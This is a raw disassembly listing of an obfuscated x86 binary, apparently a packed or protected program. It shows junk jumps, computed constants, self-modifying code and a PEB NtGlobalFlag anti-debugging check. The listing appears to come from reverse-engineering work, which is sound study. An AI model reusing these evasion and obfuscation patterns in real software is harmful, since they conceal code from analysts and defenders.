; START	OF FUNCTION CHUNK FOR sub_45A7E8

loc_4394F1:				; CODE XREF: sub_45A7E8-151B5j
		jmp	loc_442161
; END OF FUNCTION CHUNK	FOR sub_45A7E8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B547

loc_4394F6:				; CODE XREF: sub_43B547+Aj
		jmp	loc_44FFC6
; END OF FUNCTION CHUNK	FOR sub_43B547
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455F71

loc_4394FB:				; CODE XREF: sub_455F71:loc_455F7Aj
		test	edi, 20000000h
		jmp	loc_45B661
; END OF FUNCTION CHUNK	FOR sub_455F71
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_247. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B5E2

loc_439507:				; CODE XREF: sub_43B5E2+D4ECj
		xchg	ebx, [esp+0]
		jmp	loc_4570C9
; END OF FUNCTION CHUNK	FOR sub_43B5E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EB47

loc_43950F:				; CODE XREF: sub_43EB47:loc_4448C4j
		shr	ebx, 0Ah
		adc	ebp, ebx
		push	19F617Ch
		push	ebx
		rol	ebp, 2
		jmp	loc_447D03
; END OF FUNCTION CHUNK	FOR sub_43EB47
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4485A2

loc_439522:				; CODE XREF: sub_4485A2:loc_44DCC9j
		xchg	edx, ecx
		jmp	loc_457649
; END OF FUNCTION CHUNK	FOR sub_4485A2

; =============== S U B	R O U T	I N E =======================================



sub_439529	proc near		; CODE XREF: hvvrg7ie:0043E502j
					; sub_444516+4DA2p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 004390B8 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00447A82 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448812 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004499CC SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0045A99D SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	esi, 0BD9D115Bh
		xchg	esi, [esp-4+arg_0]
		jmp	loc_45A99D
sub_439529	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43953B	proc near		; CODE XREF: sub_44631F+Aj

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00443B93 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00446606 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00449EEB SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00455F84 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004589C8 SIZE 00000005 BYTES

		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp+4+var_4]
		push	edx
		pop	eax
		jmp	loc_4589C8
sub_43953B	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_291. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_439549	proc near		; CODE XREF: sub_440603:loc_43A797j
					; sub_44B1C6:loc_43B43Fp ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00439181 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D50F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004422D7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044243F SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00446916 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00449ACC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FCBB SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004556DD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455FF0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004590F0 SIZE 00000011 BYTES

		jz	loc_4556DD
		mov	eax, ds:dword_43D6CC
		or	eax, eax
		jnz	loc_43D50F
		jmp	loc_455FF0
sub_439549	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4414F6

loc_439562:				; CODE XREF: sub_4414F6:loc_457ABAj
		jnz	loc_44ABB8
		jmp	loc_455CAB
; END OF FUNCTION CHUNK	FOR sub_4414F6
; ---------------------------------------------------------------------------

loc_43956D:				; CODE XREF: hvvrg7ie:loc_43FEB6j
		jz	loc_45AF77
		jmp	loc_454055
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453D0F

loc_439578:				; CODE XREF: sub_453D0F:loc_44E00Ej
					; sub_453D0F-5CF7j
		add	ecx, 9C34A026h
		and	ecx, 0C2200723h
		add	ecx, 80240A65h
		xchg	ecx, [esp+0]
		jmp	sub_456DE7
; END OF FUNCTION CHUNK	FOR sub_453D0F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E533

loc_439592:				; CODE XREF: sub_44E533:loc_455D00j
		jge	loc_43DCB6
; END OF FUNCTION CHUNK	FOR sub_44E533
; START	OF FUNCTION CHUNK FOR sub_449D38

loc_439598:				; CODE XREF: sub_449D38:loc_4438D6j
		jmp	loc_44A247
; END OF FUNCTION CHUNK	FOR sub_449D38
; ---------------------------------------------------------------------------
		mov	esi, 0EF849959h
		jmp	loc_43DCB3
; ---------------------------------------------------------------------------
		jmp	loc_43FD82
; ---------------------------------------------------------------------------
		mov	dword ptr [ebp-8], 1
		jmp	loc_4400F9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_4395B8:				; CODE XREF: sub_4403D4:loc_4486C5j
					; sub_43F227+A0EEj ...
		mov	eax, [ebp-10h]
		push	eax
		jmp	loc_449FA4
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D30A

loc_4395C1:				; CODE XREF: sub_43D30A-7A9j
		jge	loc_45A401
; END OF FUNCTION CHUNK	FOR sub_43D30A
; START	OF FUNCTION CHUNK FOR sub_451D60

loc_4395C7:				; CODE XREF: sub_451D60+14CDj
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_451D60
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453BBD

loc_4395CC:				; CODE XREF: sub_453BBD-170D0j
		jmp	loc_44B231
; END OF FUNCTION CHUNK	FOR sub_453BBD
; ---------------------------------------------------------------------------
		jge	loc_450F35
		jmp	loc_45A3F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BE8

loc_4395DC:				; CODE XREF: sub_448BE8:loc_45402Aj
		cmp	eax, 2F13262Eh
		jmp	loc_44ACE6
; END OF FUNCTION CHUNK	FOR sub_448BE8

; =============== S U B	R O U T	I N E =======================================



sub_4395E7	proc near		; CODE XREF: hvvrg7ie:0044E0BBj
					; hvvrg7ie:0044E340p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C948 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004457C5 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00450A60 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	edx
		call	sub_45329F
		push	3B3A9A47h
		xchg	esi, [esp+4+var_4]
		mov	eax, esi
		jmp	loc_43C948
sub_4395E7	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446966

loc_439600:				; CODE XREF: sub_446966+EDD9j
		and	edx, 1CA524E7h
		or	edx, ds:4000F6h
		add	edx, 0A5486BBCh
		add	ecx, edx
		push	offset loc_441C8D
		jmp	nullsub_383
; END OF FUNCTION CHUNK	FOR sub_446966

; =============== S U B	R O U T	I N E =======================================



sub_43961E	proc near		; DATA XREF: sub_448FB0-43A0o
		inc	dword ptr [ebp-0Ch]
		call	sub_43C8E0
sub_43961E	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_446284

loc_439626:				; CODE XREF: sub_446284+1029Cj
		jmp	loc_456838
; END OF FUNCTION CHUNK	FOR sub_446284
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449B65

loc_43962B:				; CODE XREF: sub_449B65+4j
		jmp	loc_4463AA
; END OF FUNCTION CHUNK	FOR sub_449B65
; ---------------------------------------------------------------------------
		mov	ds:off_41D048, eax
		lea	eax, loc_45987E
		mov	byte ptr [eax],	0C3h
		jmp	loc_457047
; ---------------------------------------------------------------------------

loc_439644:				; CODE XREF: hvvrg7ie:loc_4494AAj
		sub	eax, ecx
		pop	ecx
; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_439647:				; CODE XREF: sub_43B6A5-1740j
		rol	eax, 2
		push	ebx
		push	0DBA674F9h
		pop	ebx
		or	ebx, 60F9B741h
		jmp	loc_450D72
; END OF FUNCTION CHUNK	FOR sub_43B6A5
; ---------------------------------------------------------------------------
		cdq
		jmp	sub_450E01
; ---------------------------------------------------------------------------

loc_439662:				; CODE XREF: hvvrg7ie:loc_459B8Dj
		and	edi, 2CAC3115h
		add	edi, 0DC3857B0h
		xchg	edi, [esp]
		jmp	sub_450C5A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_439676:				; CODE XREF: sub_442FD1:loc_439AD9j
		jnz	loc_44E31F
		jmp	loc_449D66
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------

loc_439681:				; CODE XREF: hvvrg7ie:loc_4570D9j
		sub	ecx, 7C3922ECh
		add	ecx, 6EF23129h
		and	ecx, 8CC9615Bh
		jns	loc_442D3B
; START	OF FUNCTION CHUNK FOR sub_446297

loc_439699:				; CODE XREF: sub_446297+819Bj
		jmp	nullsub_242
; END OF FUNCTION CHUNK	FOR sub_446297
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452238

loc_43969E:				; CODE XREF: sub_452238-962Dj
		jmp	loc_452815
; END OF FUNCTION CHUNK	FOR sub_452238
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_68. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4396A4:				; CODE XREF: hvvrg7ie:004559A8j
		jmp	loc_45A575
; ---------------------------------------------------------------------------

loc_4396A9:				; CODE XREF: hvvrg7ie:0044CBACj
		jmp	loc_456241
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EEA9

loc_4396AE:				; CODE XREF: sub_43EEA9+1j
		jmp	loc_451996
; END OF FUNCTION CHUNK	FOR sub_43EEA9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FEF7

loc_4396B3:				; CODE XREF: sub_43FEF7:loc_45A11Ej
		sub	ebx, 16B02A54h
		add	ebx, 0E6F536CBh
		xchg	ebx, [esp+4+var_4]
		jmp	sub_44DE0A
; END OF FUNCTION CHUNK	FOR sub_43FEF7

; =============== S U B	R O U T	I N E =======================================



sub_4396C7	proc near		; CODE XREF: sub_44B69F-BD18j
					; sub_450590-315Ep

; FUNCTION CHUNK AT 0044B325 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004582DE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458D81 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx

loc_4396CB:				; CODE XREF: hvvrg7ie:0043F695j
		push	ecx
		mov	ecx, edx
		xchg	ecx, [esp+0]
		call	sub_43FC15
		jmp	loc_458D81
sub_4396C7	endp


; =============== S U B	R O U T	I N E =======================================



sub_4396DB	proc near		; DATA XREF: sub_4527A1-10639o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043A674 SIZE 00000008 BYTES

		call	sub_456DE7
		push	edi
		push	7BB6A315h
		pop	edi
		rol	edi, 16h
		or	edi, 55A82954h
		xor	edi, 892DBBD4h
		add	edi, 0A3708376h
		jmp	loc_43A674
sub_4396DB	endp

; ---------------------------------------------------------------------------

loc_439701:				; CODE XREF: hvvrg7ie:0045A6ADj
		xor	esi, eax
		jnb	loc_44C1F6

loc_439709:				; CODE XREF: hvvrg7ie:004510D5j
		rol	edi, 4
		cmp	edi, 8FB451EFh
		jmp	loc_440456

; =============== S U B	R O U T	I N E =======================================



sub_439717	proc near		; CODE XREF: sub_44A4C4+6p
					; hvvrg7ie:004563F1j

; FUNCTION CHUNK AT 0043A49B SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0043CA9A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447E51 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F75A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004516F4 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00456C90 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_4516F4
		jmp	loc_447E51
sub_439717	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43972A	proc near		; CODE XREF: sub_44CA9C-8743p
					; hvvrg7ie:00448921j

; FUNCTION CHUNK AT 0043DD80 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx

loc_43972E:				; CODE XREF: sub_449425-CC7Aj
		push	ecx
		push	offset loc_43C5F5
		jmp	loc_43DD80
sub_43972A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		xchg	edi, edx
		xor	ebx, 0B2E202A2h
		jmp	sub_44C782
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441E23

loc_439746:				; CODE XREF: sub_441E23+A3BBj
		xor	eax, 0FE279748h
		mov	edx, [esp+0]
		push	eax
		mov	eax, edx
		jmp	loc_442741
; ---------------------------------------------------------------------------

loc_439757:				; CODE XREF: sub_441E23-517Ej
		ror	eax, 13h
		xor	eax, 0B2585CE9h
		push	edi
		call	sub_441FE4
; END OF FUNCTION CHUNK	FOR sub_441E23
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_259. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451D60

loc_439767:				; CODE XREF: sub_451D60+1j
		mov	edx, ebx
		xchg	edx, [esp+4+var_4]
		push	1DA49B25h
		pop	ebx
		rol	ebx, 0Ch
		or	ebx, 3D1E9CA9h
		jmp	loc_43FA31
; END OF FUNCTION CHUNK	FOR sub_451D60
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_439780:				; CODE XREF: sub_442FD1:loc_44CF94j
					; hvvrg7ie:0044CFB1j
		add	eax, 68AC379Ch
		xchg	eax, [esp+0]
		jmp	loc_448892
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------
		jl	loc_45B43F
		jmp	loc_446900
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E063

loc_439799:				; CODE XREF: sub_43E063:loc_43F9F9j
		xchg	edx, [esp+0]
		mov	ecx, edx
		pop	edx
		ror	edx, 1Fh
		jmp	loc_44D330
; END OF FUNCTION CHUNK	FOR sub_43E063
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_4397A7:				; CODE XREF: sub_44D2F8:loc_44686Dj
					; sub_44D2F8-B91j
		push	59E8881Fh
		pop	eax

loc_4397AD:				; CODE XREF: hvvrg7ie:loc_44A90Ej
		and	eax, 2BF5274Fh
		add	eax, 0A54A58Eh
		add	eax, ebp
		add	eax, 0EBCB57F4h
		cmp	dword ptr [eax], 4742444Fh
		jz	loc_43BCB4
		jmp	loc_44C1A5
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_386. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446B4C

loc_4397D3:				; CODE XREF: sub_446B4C:loc_443DE3j
					; sub_43B7B9+1C33Ej
		jmp	loc_458E31
; END OF FUNCTION CHUNK	FOR sub_446B4C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4563DC

loc_4397D8:				; CODE XREF: sub_4563DC-193Bj
		jmp	loc_458945
; END OF FUNCTION CHUNK	FOR sub_4563DC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BE1

loc_4397DD:				; CODE XREF: sub_444BE1+361j
		jmp	loc_4451B1
; END OF FUNCTION CHUNK	FOR sub_444BE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450246

loc_4397E2:				; CODE XREF: sub_450246:loc_43D6D0j
		sbb	esi, ecx
		jmp	loc_43E476
; END OF FUNCTION CHUNK	FOR sub_450246
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DEC3

loc_4397E9:				; CODE XREF: sub_43DEC3+22CDj
		push	edx
		call	sub_459D4C
; END OF FUNCTION CHUNK	FOR sub_43DEC3
; START	OF FUNCTION CHUNK FOR sub_451669

loc_4397EF:				; CODE XREF: sub_451669-F5BFj
		jmp	nullsub_185
; END OF FUNCTION CHUNK	FOR sub_451669
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44736C

loc_4397F4:				; CODE XREF: sub_44736C:loc_439ADEj
		add	edx, 635599A0h
		mov	edx, [edx]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jmp	loc_45485E
; END OF FUNCTION CHUNK	FOR sub_44736C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BC0

loc_439805:				; CODE XREF: sub_448BC0-2C21j
		call	sub_450C5A
		push	offset sub_441FD1
		jmp	nullsub_297
; END OF FUNCTION CHUNK	FOR sub_448BC0

; =============== S U B	R O U T	I N E =======================================



sub_439814	proc near		; DATA XREF: hvvrg7ie:loc_4493F3o

; FUNCTION CHUNK AT 004399CE SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004451A6 SIZE 00000005 BYTES

		push	0
		push	0
		push	ebx
		push	0E8790D1Bh
		jmp	loc_4451A6
sub_439814	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443D2B

loc_439823:				; CODE XREF: sub_443D2B+16j
		jz	loc_4438DB
		inc	[ebp+var_8]

loc_43982C:				; CODE XREF: sub_443D2B-43Fj
					; sub_443D2B-436j
		mov	eax, [ebp+var_8]
		pop	ecx
		pop	ecx
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_443D2B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_439833:				; CODE XREF: sub_43F227+A86Ej
		jmp	loc_4423FA
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
		mov	edx, [ebp-18h]
		mov	[edx], eax
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_43983D:				; CODE XREF: sub_45889B-1D178j
					; sub_457532-AB31j ...
		add	dword ptr [ebp-18h], 4
		inc	dword ptr [ebp-20h]
		dec	dword ptr [ebp-2Ch]
		jnz	loc_43B714
		jmp	loc_44CEDA
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E100

loc_439852:				; CODE XREF: sub_43E100:loc_44285Dj
		jz	loc_43A265
; END OF FUNCTION CHUNK	FOR sub_43E100
; START	OF FUNCTION CHUNK FOR sub_443452

loc_439858:				; CODE XREF: sub_443452:loc_45AA22j
		mov	esi, [ebp+0]
		xchg	ebx, ecx
		cmp	eax, 29EA65D2h
		jmp	loc_44E88C
; END OF FUNCTION CHUNK	FOR sub_443452
; ---------------------------------------------------------------------------
		jbe	loc_443120
		jmp	sub_44B2D5

; =============== S U B	R O U T	I N E =======================================



sub_439873	proc near		; CODE XREF: hvvrg7ie:00440032j
					; sub_44388C+9E78p

arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0043A661 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043BA03 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043C3D7 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043E862 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00440904 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00441464 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441C18 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00441F49 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00443631 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445222 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044608C SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0044C665 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CA77 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00450E78 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045100E SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004532EE SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00455448 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00459CA6 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0045A9A7 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	ecx, [ebx+edx-4]
		or	ecx, ecx
		jmp	loc_445222
sub_439873	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_439882:				; CODE XREF: sub_44388C:loc_44D6E4j
		add	edx, 14h
		mov	ecx, [ebx+edx-8]
		or	ecx, ecx
		jmp	loc_446D88
; END OF FUNCTION CHUNK	FOR sub_44388C
; ---------------------------------------------------------------------------
		mov	eax, large fs:30h
		mov	eax, [eax+68h]
		test	eax, 70h
		jz	loc_458EFF
		jmp	loc_44B51F
; ---------------------------------------------------------------------------
		jno	loc_43A273
		mov	[ebx], edi
		jmp	loc_43F374

; =============== S U B	R O U T	I N E =======================================



sub_4398B7	proc near		; CODE XREF: sub_4398B7:loc_452212p
					; hvvrg7ie:004556ACj

; FUNCTION CHUNK AT 00448E0D SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00452212 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452C6B SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00458AC8 SIZE 0000000B BYTES

		xchg	edi, [esp+0]
		pop	edi

loc_4398BB:				; CODE XREF: hvvrg7ie:loc_44C8F5j
		jo	loc_452C6B
		push	6087D39h
		pop	eax
		jmp	loc_448E0D
sub_4398B7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403D4

loc_4398CC:				; CODE XREF: sub_4403D4:loc_44024Bj
		push	eax
		push	6FE22354h
		pop	eax
		add	eax, 0AEEE33E3h
		xor	eax, 1E905737h
		xchg	eax, [esp+0]
		jmp	loc_442DBA
; END OF FUNCTION CHUNK	FOR sub_4403D4
; ---------------------------------------------------------------------------

loc_4398E7:				; CODE XREF: hvvrg7ie:0044CF6Bj
		add	edi, ebp
		push	offset sub_4514A2
		jmp	loc_43E6E5
; ---------------------------------------------------------------------------
		mov	[ebx], edx
		jmp	sub_43CAA5

; =============== S U B	R O U T	I N E =======================================



sub_4398FA	proc near		; CODE XREF: sub_44E533-2791j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044836B SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044E8C6 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00456E5F SIZE 00000005 BYTES

		push	ebx
		push	0C8C2B14Dh
		pop	ebx
		sub	ebx, 0B0C67A81h
		cmp	ebx, 0A9FB4315h
		jmp	loc_456E5F
sub_4398FA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_439912:				; CODE XREF: sub_450F97-AA66j
		jnz	loc_448981
; END OF FUNCTION CHUNK	FOR sub_450F97
; START	OF FUNCTION CHUNK FOR sub_43E507

loc_439918:				; CODE XREF: sub_43E507+1Fj
		jmp	loc_445901
; END OF FUNCTION CHUNK	FOR sub_43E507
; ---------------------------------------------------------------------------
		cdq
		jmp	loc_43AC10
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443375

loc_439923:				; CODE XREF: sub_443375:loc_4577F2j
		add	ecx, 0F0442790h
		xchg	ecx, [esp+0]
		jmp	loc_439493
; END OF FUNCTION CHUNK	FOR sub_443375
; ---------------------------------------------------------------------------
		jz	loc_457281
		call	sub_453EFC
; START	OF FUNCTION CHUNK FOR sub_449007

loc_43993C:				; CODE XREF: sub_449007+1431j
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_449007
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C132

loc_439941:				; CODE XREF: sub_44C132+9j
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		mov	al, [eax]
		push	offset sub_44646D
		jmp	loc_44F5E4
; END OF FUNCTION CHUNK	FOR sub_44C132

; =============== S U B	R O U T	I N E =======================================



sub_439953	proc near		; CODE XREF: sub_4417B1:loc_4417B7p
					; hvvrg7ie:00443F95j

; FUNCTION CHUNK AT 00441E94 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004433A5 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044402F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004559B3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045ADA4 SIZE 00000025 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		div	ecx
		mov	[ebp-14h], edx
		mov	eax, [ebp-0Ch]
		mov	ecx, 3F5h
		xor	edx, edx
		div	ecx
		jmp	loc_4559B3
sub_439953	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		test	eax, eax
		setnz	byte ptr [ebp-1]
; START	OF FUNCTION CHUNK FOR sub_43B9C9

loc_439973:				; CODE XREF: sub_454D23-1622Ej
					; sub_43B9C9+188DBj ...
		mov	al, [ebp-1]
		pop	ecx
		xchg	ebx, [esp-4+arg_0]
		mov	ebp, ebx
		pop	ebx
		retn
; END OF FUNCTION CHUNK	FOR sub_43B9C9
; ---------------------------------------------------------------------------

loc_43997E:				; CODE XREF: hvvrg7ie:00442396j
		sbb	ebp, edi
		jmp	loc_44C427
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4413A5

loc_439985:				; CODE XREF: sub_4413A5:loc_442F10j
		cmp	ecx, 77E79CA6h
		jmp	loc_442A5C
; END OF FUNCTION CHUNK	FOR sub_4413A5

; =============== S U B	R O U T	I N E =======================================



sub_439990	proc near		; CODE XREF: sub_43F521p
					; hvvrg7ie:0045A199j

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043A491 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00440C29 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004420D3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004481C7 SIZE 00000027 BYTES
; FUNCTION CHUNK AT 0044D600 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044F7CA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AD85 SIZE 00000014 BYTES

		xchg	esi, [esp+0]
		pop	esi
		jno	loc_43A491
		pop	edx
		mov	eax, [esp-8+arg_4]
		push	edx
		call	sub_4403D4
		mov	eax, 851AF986h
		jmp	loc_44D600
sub_439990	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4399AE	proc near		; DATA XREF: sub_44722C+Co

; FUNCTION CHUNK AT 0043B89B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045736C SIZE 00000005 BYTES

		add	eax, [ebp-8]
		mov	[ebp-24h], eax
		push	0CBB43F1Ch
		pop	eax
		rol	eax, 11h
		or	eax, 0E399948Dh
		add	eax, 592D3D8Fh
		jmp	loc_45736C
sub_4399AE	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439814

loc_4399CE:				; CODE XREF: sub_439814:loc_4451A6j
		pop	ebx
		sub	ebx, 0B5698108h
		jns	loc_43BF8C
; END OF FUNCTION CHUNK	FOR sub_439814
; START	OF FUNCTION CHUNK FOR sub_44C2EA

loc_4399DB:				; CODE XREF: sub_44C2EA+3B5Fj
		jmp	loc_456368
; END OF FUNCTION CHUNK	FOR sub_44C2EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F7CF

loc_4399E0:				; CODE XREF: sub_44F7CF:loc_44F83Ej
		jmp	nullsub_116
; END OF FUNCTION CHUNK	FOR sub_44F7CF
; ---------------------------------------------------------------------------
		sub	eax, edx
		not	eax
; START	OF FUNCTION CHUNK FOR sub_45A234

loc_4399E9:				; CODE XREF: sub_45A234:loc_4436E9j
		xchg	eax, ebx
		jmp	loc_43BF86
; END OF FUNCTION CHUNK	FOR sub_45A234
; ---------------------------------------------------------------------------
		sub	edi, 0CE2196D5h
		jge	loc_4583C1
		jmp	loc_442705
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448100

loc_439A01:				; CODE XREF: sub_448100:loc_44CFE7j
		add	ecx, 0BCF4A1E2h
		xor	ecx, 0D8D1813Ah
		add	ecx, 0AFD22F79h
		add	eax, ecx
		pop	ecx
		jmp	loc_452362
; END OF FUNCTION CHUNK	FOR sub_448100
; ---------------------------------------------------------------------------
		db 0Fh
; ---------------------------------------------------------------------------
		mov	bh, [esi+68000177h]
		adc	[esi], esi
		mov	dh, 8Eh
		jle	loc_43EC34

loc_439A2C:				; CODE XREF: hvvrg7ie:loc_4509F3j
		add	edx, 9D7BEE28h
		xchg	edx, [esp]
